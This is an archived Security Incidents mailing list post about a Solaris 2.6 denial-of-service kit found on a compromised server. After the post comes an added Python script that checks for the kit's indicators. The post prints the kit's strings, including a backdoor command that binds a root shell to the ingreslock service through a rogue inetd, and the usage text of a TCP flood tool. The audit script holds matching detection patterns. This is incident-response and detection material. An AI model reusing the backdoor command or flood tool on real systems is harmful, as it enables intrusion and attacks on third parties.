Security Incidents mailing list archives

Solaris DoS kit


From: Elias Levy <aleph1 () SECURITYFOCUS COM>
Date: Tue, 22 Aug 2000 12:35:29 -0700

[ This message is from an anonymous contributor ]

This was used by a btinternet user against www.amazon.com via one of our
Solaris 2.6 servers.  Expect they got in via an old sadmind vulnerability
which wasn't patched on a server which really should have been behind a
firewall.

Most of this is pretty uninteresting, wipe is just a utmp/wtmp wiper for
example.

The kit adds telnetd to /etc/inetd.conf, removes sadmind from /etc/rpc and
adds it to /etc/init.d/rpc and installs a bogus sadmind binary which is
used for denial of service attacks.

The DoS type is spoofed source random tcp-high to tcp-high on target host.

bash-2.01# tar tvf solkit.tar
-rw-r--r--   0/0      109 Jul  1 08:50 2000 path.sh
-rw-r--r--   0/0    34300 Jul 28 03:04 2000 sadmind
-rw-r--r--   0/0      130 Jul  1 08:49 2000 secure.sh
-rw-r--r--   0/0     6936 Jul  1 03:25 2000 set
-rw-r--r--   0/0    29464 Jul 20 06:29 2000 stream
-rw-r--r--   0/0    32560 Jul  1 03:25 2000 wipe
bash-2.01# cat path.sh
 PATH=/bin:/usr/bin:/usr/sbin:usr/ucb/bin:/usr/local/bin:/usr/opt/local/bin:/usr/ccs/bin:/opt/public/bin:. ;
bash-2.01# cat secure.sh
kill -9 ` ps -ef | grep "/inetd -s /tmp" | awk '{print $2} '`
kill -HUP `ps -ef | grep " /usr/sbin/inetd -s" | awk '{print $2} '`
bash-2.01# strings sadmind
-csh
 fawking into background || coded by blazinweed || blazinweed () stoned com
socket
bind
listen
accept
%s %s %s %s %s
ld.so.1
wrong pass
/bin/echo '%s  stream  tcp     nowait  root    /bin/sh sh -i'>  /tmp/.h;/usr/sbin/inetd -s /tmp/.h &
ingreslock
PONG
Could not resolve %s.
jess
setsockopt
flooding target
bash-2.01# strings stream
Usage: %s <dstaddr> <dstport> <pktsize> <pps>
    dstaddr  - the target we are trying to attack.
    dstport  - the port of the target, 0 = random.
    pktsize  - the extra size to use.  0 = normal
syn.
Could not resolve %s.
jess
stream.c v1.0 - TCP Packet Storm
socket
setsockopt
Resolving IPs...
Sending...

----- End forwarded message -----

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
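The forwarded message gives a handful of host-level indicators for this kit: an extra `inetd` started with `-s /tmp/.h`, an inetd entry that binds `/bin/sh sh -i` as root to the `ingreslock` service, a telnet line added to `/etc/inetd.conf`, and the `sadmind` entry deleted from `/etc/rpc`. The Python below is an added example, not part of the original post or the kit, that turns those indicators into a small audit a Solaris admin could run over `ps -ef` output and the inetd/rpc tables. The sample data is constructed here to resemble Solaris 2.6 output; the PIDs, the RPC program table and the `audit()` helper are assumptions of this example.

```python
import re

# Indicators from the forwarded message: the bogus sadmind writes an inetd
# config to /tmp/.h and starts "/usr/sbin/inetd -s /tmp/.h" with a root shell
# bound to the ingreslock service; the installer adds telnetd to
# /etc/inetd.conf and removes sadmind from /etc/rpc.
ROGUE_INETD = re.compile(r"/inetd\s+-s\s+/tmp/")
SHELL_SERVICE = re.compile(
    r"^\s*(\S+)\s+stream\s+tcp\s+nowait\s+root\s+/bin/sh\b", re.MULTILINE)


def rogue_inetd_pids(ps_output):
    """PIDs of inetd processes loading a config file from /tmp (ps -ef format)."""
    pids = []
    for line in ps_output.splitlines():
        if ROGUE_INETD.search(line):
            fields = line.split()          # UID PID PPID C STIME TTY TIME CMD
            if len(fields) > 1 and fields[1].isdigit():
                pids.append(int(fields[1]))
    return pids


def shell_services(inetd_conf):
    """Service names in an inetd config whose handler is /bin/sh run as root."""
    return SHELL_SERVICE.findall(inetd_conf)


def telnet_enabled(inetd_conf):
    """True if an uncommented telnet entry is present in the inetd config."""
    for line in inetd_conf.splitlines():
        fields = line.split()
        if fields and fields[0] == "telnet":
            return True
    return False


def missing_rpc_services(rpc_table, expected=("sadmind",)):
    """Names from `expected` that have no entry in an /etc/rpc-style table."""
    present = set()
    for line in rpc_table.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        if line:
            present.add(line.split()[0])
    return [name for name in expected if name not in present]


def audit(ps_output, inetd_configs, rpc_table):
    """Run every check and return a list of human-readable findings.

    inetd_configs maps a config path to its text, so the regular
    /etc/inetd.conf and any file handed to a rogue `inetd -s` are both checked.
    """
    findings = []
    for pid in rogue_inetd_pids(ps_output):
        findings.append("inetd loading a config from /tmp (pid %d)" % pid)
    for path, text in inetd_configs.items():
        for name in shell_services(text):
            findings.append("root shell bound to service '%s' in %s" % (name, path))
    main_conf = inetd_configs.get("/etc/inetd.conf", "")
    if telnet_enabled(main_conf):
        findings.append("telnet enabled in /etc/inetd.conf")
    for name in missing_rpc_services(rpc_table):
        findings.append("%s entry missing from /etc/rpc" % name)
    return findings


# Constructed sample input (assumed values, modelled on Solaris 2.6 output).
SAMPLE_PS = """\
     UID   PID  PPID   C    STIME TTY      TIME CMD
    root   134     1   0   Jul 28 ?        0:00 /usr/sbin/inetd -s
    root  2217     1   0   Aug 21 ?        0:00 /usr/sbin/inetd -s /tmp/.h
"""
SAMPLE_INETD_CONF = """\
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd       in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd    in.telnetd
#shell   stream  tcp     nowait  root    /usr/sbin/in.rshd       in.rshd
"""
SAMPLE_TMP_H = "ingreslock  stream  tcp     nowait  root    /bin/sh sh -i\n"
SAMPLE_RPC = """\
rpcbind         100000  portmap sunrpc rpcbind
rstatd          100001  rstat rup perfmeter
"""

if __name__ == "__main__":
    configs = {"/etc/inetd.conf": SAMPLE_INETD_CONF, "/tmp/.h": SAMPLE_TMP_H}
    for finding in audit(SAMPLE_PS, configs, SAMPLE_RPC):
        print("FINDING:", finding)
```

On a live host the three inputs would come from `ps -ef`, the files named in `inetd`'s argument list, and `/etc/rpc`; the check against the rogue `-s` config matters most, since the root shell lives there rather than in `/etc/inetd.conf`.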
